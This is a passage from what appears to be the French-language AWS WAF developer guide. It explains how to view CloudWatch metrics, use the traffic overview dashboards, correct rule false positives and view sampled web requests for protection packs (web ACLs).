     Pour de plus amples informations, veuillez consulter [Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md).
   + ** CloudWatch Métriques Amazon** — Vous pouvez accéder aux mesures suivantes pour évaluer votre demande de pack de protection (ACL Web). 
     + **Vos règles : les** métriques sont regroupées en fonction de l'action de la règle. Par exemple, lorsque vous testez une règle en Count mode, ses correspondances sont répertoriées sous forme de `Count` métriques pour le pack de protection (ACL Web). 
     + **Vos groupes de règles** : les statistiques de vos groupes de règles sont répertoriées sous les métriques des groupes de règles. 
     + **Groupes de règles appartenant à un autre compte** : les statistiques des groupes de règles ne sont généralement visibles que par le propriétaire du groupe de règles. Toutefois, si vous annulez l'action d'une règle, les mesures associées à cette règle seront répertoriées dans les métriques de votre pack de protection (ACL Web). En outre, les étiquettes ajoutées par n'importe quel groupe de règles sont répertoriées dans les métriques de votre pack de protection (ACL Web). 

       Les règles d'action de comptage dans les groupes de règles n'émettent PAS de métriques de dimension ACL Web RuleGroup, uniquement les dimensions Règle et Région. Cela s'applique même lorsque le groupe de règles est référencé dans une ACL Web.

       Les groupes de règles de cette catégorie sont les groupes de règles [AWS Règles gérées pour AWS WAF](aws-managed-rule-groups.md) [AWS Marketplace groupes de règles](marketplace-rule-groups.md)[Reconnaissance des groupes de règles fournis par d'autres services](waf-service-owned-rule-groups.md),, et les groupes de règles partagés avec vous par un autre compte. Lorsqu'un pack de protection (ACL Web) est déployé via Firewall Manager, les règles du WebACL comportant une action Count n'afficheront pas leurs métriques dans le compte du membre.
     + **Étiquettes** : les étiquettes ajoutées à une demande Web lors de l'évaluation sont répertoriées dans les métriques d'étiquette du pack de protection (ACL Web). Vous pouvez accéder aux statistiques de toutes les étiquettes, qu'elles aient été ajoutées par vos règles et groupes de règles ou par les règles d'un groupe de règles appartenant à un autre compte. 

     Pour de plus amples informations, veuillez consulter [Affichage des métriques pour votre ACL Web](web-acl-testing-view-metrics.md).
   + **Tableaux de bord de vue d'ensemble du trafic du pack de protection (ACL Web)** : accédez aux résumés du trafic Web évalué par un pack de protection (ACL Web) en accédant à la page du pack de protection (ACL Web) dans la AWS WAF console et en ouvrant l'onglet **Aperçu du trafic**. 

     Les tableaux de bord d'aperçu du trafic fournissent des résumés en temps quasi réel des CloudWatch métriques AWS WAF collectées par Amazon lors de l'évaluation du trafic Web de votre application. 

     Pour de plus amples informations, veuillez consulter [Tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs)](web-acl-dashboards.md).
   + **Demandes Web échantillonnées** : accédez aux informations relatives aux règles qui correspondent à un échantillon de requêtes Web. Les exemples d'informations identifient les règles correspondantes par le nom de métrique de la règle dans le pack de protection (ACL Web). Pour les groupes de règles, la métrique identifie l'énoncé de référence du groupe de règles. Pour les règles au sein de groupes de règles, l'exemple répertorie le nom de règle correspondant dans`RuleWithinRuleGroup`. 

     Pour de plus amples informations, veuillez consulter [Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md).

1. 

**Configurer les mesures d'atténuation pour corriger les faux positifs**

   Si vous déterminez qu'une règle génère des faux positifs, en faisant correspondre les requêtes Web alors qu'elle ne le devrait pas, les options suivantes peuvent vous aider à ajuster les protections de votre pack de protection (ACL Web) afin de les atténuer. 

**Corriger les critères d'inspection des règles**  
Pour vos propres règles, il vous suffit souvent d'ajuster les paramètres que vous utilisez pour inspecter les requêtes Web. Les exemples incluent la modification des spécifications d'un ensemble de modèles regex, l'ajustement des transformations de texte que vous appliquez à un composant de demande avant l'inspection ou le passage à l'utilisation d'une adresse IP transférée. Consultez les instructions relatives au type de règle à l'origine des problèmes, sous[Utilisation d'instructions de règle dans AWS WAF](waf-rule-statements.md). 

**Corriger des problèmes plus complexes**  
Pour les critères d'inspection que vous ne contrôlez pas et pour certaines règles complexes, vous devrez peut-être apporter d'autres modifications, par exemple en ajoutant des règles qui autorisent ou bloquent explicitement les demandes ou qui éliminent les demandes de l'évaluation par la règle problématique. Les groupes de règles gérés ont le plus souvent besoin de ce type d'atténuation, mais d'autres règles le peuvent également. Les exemples incluent l'instruction de règle basée sur le débit et l'instruction de règle d'attaque par injection SQL. 

   Les mesures à prendre pour atténuer les faux positifs dépendent de votre cas d'utilisation. Les approches les plus courantes sont les suivantes :
   + **Ajouter une règle atténuante** : ajoutez une règle qui s'exécute avant la nouvelle règle et qui autorise explicitement les demandes qui génèrent des faux positifs. Pour plus d'informations sur l'ordre d'évaluation des règles dans une ACL Web, consultez[Définition de la priorité des règles](web-acl-processing-order.md).

     Avec cette approche, les demandes autorisées sont envoyées à la ressource protégée, de sorte qu'elles n'atteignent jamais la nouvelle règle d'évaluation. Si la nouvelle règle est un groupe de règles géré payant, cette approche peut également contribuer à limiter le coût d'utilisation du groupe de règles. 
   + **Ajouter une règle logique avec une règle atténuante** : utilisez des instructions de règle logique pour combiner la nouvelle règle avec une règle qui exclut les faux positifs. Pour plus d'informations, consultez [Utilisation d'instructions de règles logiques dans AWS WAF](waf-rule-statements-logical.md).

     Supposons, par exemple, que vous ajoutiez une instruction SQL Attack Match qui génère des faux positifs pour une catégorie de requêtes. Créez une règle qui correspond à ces demandes, puis combinez les règles à l'aide d'instructions de règles logiques afin de ne faire correspondre que les demandes qui ne répondent pas aux critères des faux positifs et qui répondent aux critères des attaques par injection SQL. 
   + **Ajouter une instruction de portée réduite** : pour les instructions basées sur le taux et les instructions de référence à des groupes de règles gérés, excluez les demandes qui génèrent des faux positifs de l'évaluation en ajoutant une instruction de portée réduite dans l'instruction principale. 

     Une demande qui ne correspond pas à l'instruction scope-down n'atteint jamais le groupe de règles ou l'évaluation basée sur le taux. Pour plus d'informations sur les instructions de portée réduite, consultez. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md) Pour obtenir un exemple, consultez [Exclure la plage d'adresses IP de la gestion des robots](waf-bot-control-example-scope-down-ip.md). 
   + **Ajouter une règle de correspondance des libellés** : pour les groupes de règles qui utilisent l'étiquetage, identifiez l'étiquette que la règle problématique applique aux demandes. Vous devrez peut-être d'abord définir les règles du groupe de règles en mode décompte, si ce n'est déjà fait. Ajoutez une règle de correspondance des libellés, positionnée pour s'exécuter après le groupe de règles, qui correspond à l'étiquette ajoutée par la règle problématique. Dans la règle de correspondance des libellés, vous pouvez filtrer les demandes que vous souhaitez autoriser de celles que vous souhaitez bloquer. 

     Si vous utilisez cette approche, lorsque vous aurez terminé le test, conservez la règle problématique en mode décompte dans le groupe de règles et maintenez votre règle de correspondance d'étiquettes personnalisée en place. Pour plus d'informations sur les déclarations de correspondance des étiquettes, voir[Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md). Pour obtenir des exemples, consultez [Autoriser un bot bloqué spécifique](waf-bot-control-example-allow-blocked-bot.md) et [Exemple ATP : gestion personnalisée des informations d'identification manquantes ou compromises](waf-atp-control-example-user-agent-exception.md). 
   + **Modifier la version d'un groupe de règles géré** : pour les groupes de règles gérés versionnés, modifiez la version que vous utilisez. Par exemple, vous pouvez revenir à la dernière version statique que vous avez utilisée avec succès. 

     Il s'agit généralement d'une solution temporaire. Vous pouvez modifier la version pour votre trafic de production pendant que vous continuez à tester la dernière version dans votre environnement de test ou de préparation, ou pendant que vous attendez une version plus compatible de la part du fournisseur. Pour plus d'informations sur les versions des groupes de règles gérés, consultez[Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md).

Lorsque vous êtes certain que les nouvelles règles correspondent aux demandes comme vous le souhaitez, passez à l'étape suivante de vos tests et répétez cette procédure. Effectuez la dernière étape de test et de réglage dans votre environnement de production.

# Affichage des métriques pour votre ACL Web
<a name="web-acl-testing-view-metrics"></a>

Cette section explique comment afficher les métriques de votre pack de protection (ACL Web).

Après avoir associé un pack de protection (ACL Web) à une ou plusieurs AWS ressources, vous pouvez consulter les statistiques obtenues pour l'association dans un CloudWatch graphique Amazon. 

Pour plus d'informations sur AWS WAF les métriques, consultez[AWS WAF métriques et dimensions](waf-metrics.md). Pour plus d'informations sur CloudWatch les métriques, consultez le [guide de CloudWatch l'utilisateur Amazon](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html). 

Pour chacune des règles d'un pack de protection (ACL Web) et pour toutes les demandes qu'une ressource associée transmet AWS WAF pour un pack de protection (ACL Web), vous CloudWatch pouvez effectuer les opérations suivantes :
+ Afficher les données de l'heure précédente ou des trois heures précédentes.
+ Modifiez l'intervalle entre les points de données.
+ Modifiez le calcul effectué sur CloudWatch les données, tel que le maximum, le minimum, la moyenne ou la somme.

**Note**  
AWS WAF with CloudFront est un service mondial et les statistiques ne sont disponibles que lorsque vous choisissez la région **USA Est (Virginie du Nord)** dans le AWS Management Console. Si vous choisissez une autre région, aucune AWS WAF métrique n'apparaîtra dans la CloudWatch console.

**Pour afficher les données relatives aux règles d'un pack de protection (ACL Web)**

1. Connectez-vous à la CloudWatch console AWS Management Console et ouvrez-la à l'adresse [https://console.aws.amazon.com/cloudwatch/](https://console.aws.amazon.com/cloudwatch/).

1. Si nécessaire, remplacez la région par celle où se trouvent vos AWS ressources. Pour CloudFront, choisissez la région USA Est (Virginie du Nord).

1. Dans le volet de navigation, sous **Mesures**, sélectionnez **Toutes les mesures**, puis recherchez dans l'onglet **Parcourir** pour`AWS::WAFV2`. 

1. Cochez la case correspondant au pack de protection (ACL Web) dont vous souhaitez consulter les données.

1. Modifiez les paramètres applicables :  
**Statistique**  
Choisissez le calcul à CloudWatch effectuer sur les données.  
**Plage horaire**  
Choisissez si vous souhaitez afficher les données de la dernière heure ou des trois dernières heures.  
**Period**  
Choisissez l'intervalle entre les points de données sur le graphique.  
**Rules**  
Choisissez les règles dont vous souhaitez afficher les données.  
Si vous modifiez le nom d'une règle et que vous souhaitez que le nom de la métrique de la règle reflète le changement, vous devez également mettre à jour le nom de la métrique. AWS WAF ne met pas automatiquement à jour le nom de la métrique d'une règle lorsque vous modifiez le nom de la règle. Vous pouvez modifier le nom de la métrique lorsque vous modifiez la règle dans la console, à l'aide de l'éditeur JSON de règles. Vous pouvez également modifier les deux noms via APIs et dans toute liste JSON que vous utilisez pour définir votre pack de protection (ACL Web) ou votre groupe de règles.

   Notez ce qui suit :
   + Si vous avez récemment associé un pack de protection (ACL Web) à une AWS ressource, vous devrez peut-être attendre quelques minutes pour que les données apparaissent dans le graphique et que la métrique du pack de protection (ACL Web) apparaisse dans la liste des mesures disponibles.
   + Si vous associez plusieurs ressources à un pack de protection (ACL Web), les CloudWatch données incluront les demandes pour chacune d'entre elles.
   + Vous pouvez placer le curseur sur un point de données pour obtenir plus d'informations.
   + Le graphique n'est pas actualisé automatiquement. Pour mettre à jour l'affichage, cliquez sur l'icône (![\[Icon to refresh the CloudWatch graph\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/cloudwatch-refresh-icon.png)).

Pour plus d'informations sur CloudWatch les métriques, consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 

# Tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs)
<a name="web-acl-dashboards"></a>

Cette section décrit les tableaux de bord de présentation du trafic du pack de protection (ACL Web) de la AWS WAF console. Après avoir associé un pack de protection (ACL Web) à une ou plusieurs AWS ressources et activé les métriques pour le pack de protection (ACL Web), vous pouvez accéder aux résumés du trafic Web évalué par le pack de protection (ACL Web) en accédant à l'onglet **Aperçu du trafic** du pack de protection (ACL Web) dans la AWS WAF console. Les tableaux de bord incluent des résumés en temps quasi réel des CloudWatch métriques AWS WAF collectées par Amazon lors de l'évaluation du trafic Web de votre application, y compris une analyse de l'activité des agents et des robots intelligents spécialisés.

**Note**  
Si vous ne voyez rien sur les tableaux de bord, assurez-vous que les métriques sont activées pour le pack de protection (ACL Web). 

L'onglet **Aperçu du trafic** du pack de protection (ACL Web) contient des tableaux de bord à onglets contenant les catégories d'informations suivantes : 
+ **Informations de sécurité de pointe** : des informations sur vos AWS WAF protections AWS WAF obtenues en interrogeant directement les journaux Amazon CloudWatch . Le reste du tableau de bord utilise les CloudWatch métriques. Ces informations fournissent des informations plus riches, mais entraînent des coûts supplémentaires liés à l'interrogation des CloudWatch journaux. Pour plus d'informations sur les coûts supplémentaires, consultez la section [Tarification d'Amazon CloudWatch Logs](https://aws.amazon.com/cloudwatch/pricing/). 
+ **Analyse du trafic basé sur l'IA** : les requêtes Web sont analysées pour détecter l'activité des robots et des agents intelligents, y compris l'identification des robots, la classification des intentions, les modèles d'accès et les tendances temporelles. Cet onglet est disponible lorsque votre pack de protection (ACL Web) reçoit du trafic de bot AI
+ **Tout le trafic** : toutes les demandes Web évaluées par le pack de protection (ACL Web). 

  Le tableau de bord met l'accent sur la fin des actions, mais vous pouvez consulter les correspondances aux règles de décompte aux emplacements suivants : 
  + Panneau **des 10 meilleures règles** de ce tableau de bord. Activez l'**action Basculer vers le comptage** pour afficher les correspondances aux règles de comptage. 
  + Onglet de **demandes échantillonnées** de la page du pack de protection (ACL Web). Ce nouvel onglet inclut un graphique de toutes les règles correspondantes. Pour plus d'informations, consultez [Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 
+ **Anti- DDo S** — Le Web demande que le pack de protection (ACL Web) évalue à l'aide du groupe de règles géré `AntiDDoSRuleSet` Anti- DDo S.

  Cet onglet n'est disponible que si vous utilisez ce groupe de règles dans votre pack de protection (ACL Web).
+ **Contrôle des robots** : requêtes Web que le pack de protection (ACL Web) évalue à l'aide du groupe de règles géré par Bot Control. 
+ Si vous n'utilisez pas ce groupe de règles dans votre pack de protection (ACL Web), cet onglet affiche les résultats de l'évaluation d'un échantillon de votre trafic Web par rapport aux règles de contrôle des bots. Cela vous donne une idée du trafic de bots que reçoit votre application et c'est gratuit. 

  Ce groupe de règles fait partie des options intelligentes d'atténuation des menaces AWS WAF proposées. Pour plus d’informations, consultez [AWS WAF Contrôle des robots](waf-bot-control.md) et [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md).
+ **Prévention du piratage de compte** : le Web demande que le pack de protection (ACL Web) évalue à l'aide du groupe de règles géré AWS WAF Fraud Control Account Takeover Prevention (ATP). Cet onglet n'est disponible que si vous utilisez ce groupe de règles dans votre pack de protection (ACL Web). 

  Le groupe de règles ATP fait partie des offres d'atténuation AWS WAF intelligente des menaces. Pour plus d’informations, consultez [AWS WAF Contrôle des fraudes et prévention des prises de contrôle des comptes (ATP)](waf-atp.md) et [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md).
+ **Prévention de la fraude lors de la création de comptes** : le Web demande que le pack de protection (ACL Web) évalue à l'aide du groupe de règles géré AWS WAF Fraud Control pour la prévention des fraudes à la création de comptes (ACFP). Cet onglet n'est disponible que si vous utilisez ce groupe de règles dans votre pack de protection (ACL Web). 

  Le groupe de règles ACFP fait partie des offres d'atténuation AWS WAF intelligente des menaces. Pour plus d’informations, consultez [AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)](waf-acfp.md) et [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md).

Les tableaux de bord sont basés sur les CloudWatch métriques du pack de protection (ACL Web), et les graphiques permettent d'accéder aux métriques correspondantes dans CloudWatch. Pour les tableaux de bord intelligents d'atténuation des menaces, tels que Bot Control, les mesures utilisées sont principalement les mesures d'étiquetage. 
+ Pour obtenir la liste des métriques AWS WAF fournies, consultez[AWS WAF métriques et dimensions](waf-metrics.md).
+ Pour plus d'informations sur CloudWatch les métriques, consultez le [guide de CloudWatch l'utilisateur Amazon](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html). 

Les tableaux de bord fournissent des résumés de vos modèles de trafic pour les actions de résiliation et la plage de dates que vous sélectionnez. Les tableaux de bord intelligents d'atténuation des menaces incluent les demandes évaluées par le groupe de règles géré correspondant, que le groupe de règles géré lui-même ait appliqué ou non l'action de résiliation. Par exemple, si cette option Block est sélectionnée, le tableau de bord de **prévention du piratage de compte** inclut des informations sur toutes les demandes Web qui ont été à la fois évaluées par le groupe de règles géré par ATP et bloquées à un moment donné lors de l'évaluation du pack de protection (ACL Web). Les demandes peuvent être bloquées par le groupe de règles géré par ATP, par une règle exécutée après le groupe de règles dans le pack de protection (ACL Web) ou par l'action par défaut du pack de protection (ACL Web). 

# Afficher les tableaux de bord d'un pack de protection (ACL Web)
<a name="web-acl-dashboards-accessing"></a>

Suivez la procédure décrite dans cette section pour accéder aux tableaux de bord du pack de protection (ACL Web) et définir les critères de filtrage des données. Si vous avez récemment associé un pack de protection (ACL Web) à une AWS ressource, vous devrez peut-être attendre quelques minutes pour que les données soient disponibles dans les tableaux de bord.

Les tableaux de bord incluent les demandes pour toutes les ressources que vous avez associées au pack de protection (ACL Web). 

**Pour consulter les tableaux de bord **d'aperçu du trafic** pour un pack de protection (ACL Web)**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, choisissez les **packs de protection (Web ACLs)**, puis recherchez l'ACL Web qui vous intéresse. 

1. Sélectionnez le pack de protection (ACL Web). La console vous amène à la page du pack de protection (ACL Web). L'onglet **Aperçu du trafic** est sélectionné par défaut.

1. Modifiez les paramètres **des filtres de données** selon vos besoins. 
   + **Mettre fin aux actions relatives aux règles** : sélectionnez les actions de résiliation à inclure dans les tableaux de bord. Les tableaux de bord résument les mesures relatives aux requêtes Web auxquelles l'une des actions sélectionnées a été appliquée lors de l'évaluation du pack de protection (ACL Web). Si vous sélectionnez toutes les actions disponibles, les tableaux de bord incluent toutes les requêtes Web évaluées. Pour plus d'informations sur les actions, consultez[Comment AWS WAF gère les actions des règles et des groupes de règles](web-acl-rule-actions.md). 
   + **Plage de temps** : sélectionnez l'intervalle de temps à afficher dans les tableaux de bord. Vous pouvez choisir d'afficher une période relative au moment présent, par exemple les 3 dernières heures ou la dernière semaine, et vous pouvez sélectionner une plage de temps absolue dans un calendrier. 
   + **Fuseau horaire** : ce paramètre s'applique lorsque vous spécifiez une plage de temps absolue. Vous pouvez utiliser le fuseau horaire local de votre navigateur ou le temps universel coordonné (UTC). 

Passez en revue les informations figurant dans les onglets qui vous intéressent. Les sélections de filtres de données s'appliquent à tous les tableaux de bord. Dans les volets graphiques, vous pouvez placer le curseur sur un point de données ou une zone pour afficher des détails supplémentaires. 

**Countrègles d'action**  
Vous pouvez consulter les informations relatives aux matchs par action de comptage à l'un des deux endroits suivants. 
+ Dans cet onglet **Aperçu du trafic**, sur le tableau de bord de l'**ensemble du trafic**, recherchez le volet **des 10 meilleures règles** et activez **Switch to count action**. Lorsque cette option est activée, le volet affiche le nombre de correspondances de règles au lieu de mettre fin aux correspondances de règles.
+ Dans l'onglet **Demandes échantillonnées** du pack de protection (ACL Web), consultez un graphique de toutes les correspondances de règles et actions pour la plage de temps que vous avez définie dans l'onglet **Aperçu du trafic**. Pour plus d'informations sur l'onglet **Demandes échantillonnées**, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

**CloudWatch Métriques Amazon**  
Dans les volets graphiques du tableau de bord, vous pouvez accéder aux CloudWatch métriques des données graphiques. Choisissez l'option en haut du volet graphique ou dans le menu déroulant (**ellipses** verticales) situé à l'intérieur du volet. 

**Actualisation des tableaux de bord**  
Les tableaux de bord ne sont pas actualisés automatiquement. Pour mettre à jour l'affichage, cliquez sur l'![\[Icon to refresh the dashboard graph\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/cloudwatch-refresh-icon.png)icône d'actualisation.

# Exemples de tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs)
<a name="web-acl-dashboards-screenshots"></a>

Cette section présente des exemples d'écrans des tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs). 

**Note**  
Si vous utilisez déjà AWS WAF pour protéger les ressources de votre application, vous pouvez consulter les tableaux de bord de chacun de vos packs de protection (Web ACLs) sur la page correspondante de la AWS WAF console. Pour plus d'informations, consultez [Afficher les tableaux de bord d'un pack de protection (ACL Web)](web-acl-dashboards-accessing.md).

**Exemple d'écran : filtres de données et nombre d'actions **du tableau de bord pour l'ensemble du trafic****  
La capture d'écran suivante montre l'aperçu du trafic pour un pack de protection (ACL Web) avec l'onglet **Tout le trafic** sélectionné. Les filtres de données sont définis sur les valeurs par défaut : toutes les actions ont été interrompues au cours des trois dernières heures. 

Le tableau de bord de l'ensemble du trafic contient le total des actions pour les différentes actions de terminaison. Chaque volet répertorie le nombre de demandes et affiche une up/down flèche indiquant le changement depuis les trois heures précédentes. 

![\[La AWS WAF console affiche l'onglet Aperçu du trafic de la page du pack de protection (ACL Web) avec les filtres de données par défaut sélectionnés. Les options d'action de la règle de terminaison sont BlockAllow,CAPTCHA, etChallenge. Sous la section des filtres de données se trouvent des onglets pour l'ensemble du trafic, le contrôle des bots et la prévention du piratage de compte.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/web-acl-dashboard-data-filters-default-top-actions.png)


**Exemple d'écran : nombre d'actions **du tableau de bord Bot Control****  
La capture d'écran suivante montre le nombre d'actions pour le tableau de bord Bot Control. Cela affiche les mêmes volets de totaux pour la plage de temps, mais les dénombrements concernent uniquement les demandes évaluées par le groupe de règles Bot Control. Plus bas, dans le volet **Total des actions**, vous pouvez voir le nombre d'actions pendant la période de trois heures spécifiée. Pour cette plage de temps, l'CAPTCHAaction n'a été appliquée à aucune des demandes évaluées par le groupe de règles.

![\[La AWS WAF console affiche la partie supérieure du tableau de bord Bot Control, avec le total des actions pour la plage de temps et le total des actions pour l'ensemble de la plage de temps.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/web-acl-dashboard-bot-action-totals.png)


**Exemple d'écran : nombre d'actions du **tableau de bord d'analyse du trafic AI****  
La capture d'écran suivante illustre le tableau de bord d'analyse du trafic AI pour un pack de protection (ACL Web). Le tableau de bord affiche l'activité du bot AI sur la période sélectionnée avec des filtres pour l'organisation du bot, le type d'intention et le statut de vérification.

![\[La AWS WAF console affiche la partie supérieure du tableau de bord d'analyse du trafic AI, avec les principaux robots d'exploration et les meilleurs chemins pour la plage de temps, ainsi que le total des actions sur cette période.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/waf-phantom-edge-dashboard.png)


Le tableau de bord inclut :
+ **Panneau d'identité des robots** — Répertorie les robots IA détectés avec leurs noms et organisations
+ **Classification des intentions** : classe les objectifs des robots (exploration, indexation, recherche, etc.)
+ **Modèles d'accès** : nombre de demandes les plus URLs consultées par les agents d'IA
+ **Analyse temporelle** — Tendances des activités horaires et quotidiennes avec vue historique sur 14 jours
+ **Répartition de l'organisation** — Volume de trafic par organisation propriétaire du bot

**Exemple d'écran : graphiques récapitulatifs de l'état des jetons du tableau de bord **Bot Control****  
La capture d'écran suivante illustre deux des graphiques récapitulatifs disponibles dans le tableau de bord Bot Control. Le volet **État du jeton** indique le nombre des différentes étiquettes d'état du jeton, associé à l'action de règle appliquée à la demande. Le volet des **seuils d'absence de jeton IP** affiche les données relatives aux demandes provenant de IPs lesquelles un trop grand nombre de demandes n'ont pas été envoyées sans jeton. 

Le survol d'une zone du graphique permet d'afficher les informations détaillées disponibles. Dans le volet d'**état du jeton** de cette capture d'écran, la souris survole un point dans le temps, sans se trouver sur aucune ligne graphique. La console affiche donc les données de toutes les lignes à ce moment-là. 

![\[La AWS WAF console affiche deux volets pour le statut du jeton et les seuils d'absence de jeton IP, avec des lignes graphiques similaires pour les demandes bloquées et contestées dans chaque volet. Le volet d'état du jeton contient également un graphique pour les demandes autorisées.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/web-acl-dashboard-bot-token-panes.png)


Cette section ne présente que quelques-uns des résumés du trafic fournis dans les tableaux de bord de vue d'ensemble du trafic du pack de protection (ACL Web). Pour consulter les tableaux de bord de l'un de vos packs de protection (Web ACLs), ouvrez la page du pack de protection (ACL Web) dans la console. Pour plus d'informations sur la procédure à suivre, consultez les instructions à l'adresse[Afficher les tableaux de bord d'un pack de protection (ACL Web)](web-acl-dashboards-accessing.md).

# Affichage d'un exemple de demandes web
<a name="web-acl-testing-view-sample"></a>

Cette section décrit l'onglet **Demandes échantillonnées** du pack de protection (ACL Web) de la AWS WAF console. Dans cet onglet, vous pouvez afficher un graphique de toutes les correspondances de règles pour les requêtes Web qui ont AWS WAF été inspectées. En outre, si l'échantillonnage des demandes est activé pour le pack de protection (ACL Web), vous pouvez consulter un tableau d'un échantillon des demandes Web inspectées. AWS WAF Vous pouvez également récupérer des informations de demande échantillonnées via l'appel `GetSampledRequests` d'API.

L'échantillon de demandes contient jusqu'à 100 demandes correspondant aux critères d'une règle du pack de protection (ACL Web) et 100 autres demandes pour lesquelles l'action par défaut du pack de protection (ACL Web) a été appliquée. Les demandes de l'exemple proviennent de toutes les ressources protégées qui ont reçu des demandes concernant votre contenu au cours des trois heures précédentes. 

Lorsqu'une requête Web correspond aux critères d'une règle et que l'action associée à cette règle ne met pas fin à l'évaluation de la demande, AWS WAF continue à inspecter la demande Web en utilisant les règles suivantes du pack de protection (ACL Web). De ce fait, une requête Web peut apparaître plusieurs fois. Pour plus d'informations sur les comportements liés à l'action des règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).

**Pour afficher le graphique de toutes les règles et les demandes échantillonnées**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, choisissez les **packs de protection (Web ACLs)**.

1. Choisissez le nom du pack de protection (ACL Web) pour lequel vous souhaitez consulter les demandes. La console vous amène à la description du pack de protection (ACL Web), où vous pouvez le modifier.

1. Dans l'onglet **Demandes échantillonnées**, vous pouvez voir ce qui suit : 
   + **Graphique de toutes les règles** : ce graphique montre les règles correspondantes et les actions de règles pour toutes les évaluations de requêtes Web effectuées au cours de la période indiquée. 
**Note**  
La plage de temps pour ce graphique est définie dans l'onglet **Aperçu du trafic** du pack de protection (ACL Web), dans la section **Filtres de données**. Pour plus d'informations, consultez [Afficher les tableaux de bord d'un pack de protection (ACL Web)](web-acl-dashboards-accessing.md). 
   + **Tableau des demandes échantillonnées** : ce tableau affiche les données des demandes échantillonnées pour les 3 dernières heures. 
**Note**  
Si vous ne voyez pas les exemples que vous attendez d'un groupe de règles géré, consultez la section située sous cette procédure. 

     Pour chaque entrée, le tableau affiche les données suivantes :  
**Nom de la métrique**  
Nom de la CloudWatch métrique de la règle dans le pack de protection (ACL Web) correspondant à la demande. Si une requête Web ne correspond à aucune règle du pack de protection (ACL Web), cette valeur est **Default**.  
Si vous modifiez le nom d'une règle et que vous souhaitez que le nom de la métrique de la règle reflète le changement, vous devez également mettre à jour le nom de la métrique. AWS WAF ne met pas automatiquement à jour le nom de la métrique d'une règle lorsque vous modifiez le nom de la règle. Vous pouvez modifier le nom de la métrique lorsque vous modifiez la règle dans la console, à l'aide de l'éditeur JSON de règles. Vous pouvez également modifier les deux noms via APIs et dans toute liste JSON que vous utilisez pour définir votre pack de protection (ACL Web) ou votre groupe de règles.  
**IP Source**  
Soit l'adresse IP d'origine de la demande, soit, si le lecteur a utilisé un proxy HTTP ou un Application Load Balancer pour envoyer la demande, l'adresse IP du proxy ou de l'Application Load Balancer.   
**URI**  
La partie d'une URL qui identifie une ressource, par exemple, `/images/daily-ad.jpg`.  
**Règle au sein d'un groupe de règles**  
Si le nom de la métrique identifie une déclaration de référence de groupe de règles, cela identifie la règle au sein du groupe de règles qui correspond à la demande.   
**Action**  
Indique l'action pour la règle correspondante. Pour plus d'informations sur les actions de règle possibles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).  
Les exemples de demandes de règles comportant l'action Count dans les groupes de règles ne sont pas disponibles dans la vue Web ACL. Les mesures de comptage et les exemples de demandes de règles de groupe de règles ne sont visibles que par le propriétaire du groupe de règles.  
**Heure**  
Heure à laquelle la demande de la ressource protégée AWS WAF a été reçue. 

     Pour afficher des informations supplémentaires sur les composants d'une requête Web, choisissez le nom de l'URI dans la ligne de la demande.

**Exemples de demandes de règles dans des groupes de règles gérés**  
La console affiche des métriques pour les groupes de règles avec « règle interne au groupe de règles » spécifiant la règle qui a été déclenchée. Vous pouvez consulter les statistiques des ensembles de règles d'action par défaut et des règles en utilisant le paramètre le plus récent`RuleActionOverrides`. Pour les règles utilisant l'ancien `ExcludedRules` paramètre, sélectionnez la règle spécifique dans l'ensemble de règles dans la liste déroulante des règles relatives **aux métriques Sampled Requests**.

Si vous voyez les anciens paramètres, remplacez-les par les nouveaux pour commencer à rendre les exemples de demandes disponibles via la console. Vous pouvez le faire via la console en modifiant le groupe de règles géré dans le pack de protection (ACL Web) et en l'enregistrant. AWS WAF remplace automatiquement tous les anciens paramètres par les `RuleActionOverrides` paramètres et définit le remplacement de l'action de la règle sur. Count Pour plus d'informations sur ces deux paramètres, consultez[Liste JSON : `RuleActionOverrides` remplace `ExcludedRules`](web-acl-rule-group-override-options.md#web-acl-rule-group-override-replaces-exclude).

Vous pouvez accéder à des exemples de demandes pour une règle dont l'ancienne dérogation est en place par le biais de l' AWS WAF API REST ou de la ligne de commande. SDKs Pour plus d'informations, reportez-vous [GetSampledRequests](https://docs.aws.amazon.com/waf/latest/APIReference/API_GetSampledRequests.html)à la *référence de AWS WAF l'API*.

Voici la syntaxe de la demande de ligne de commande : 

```
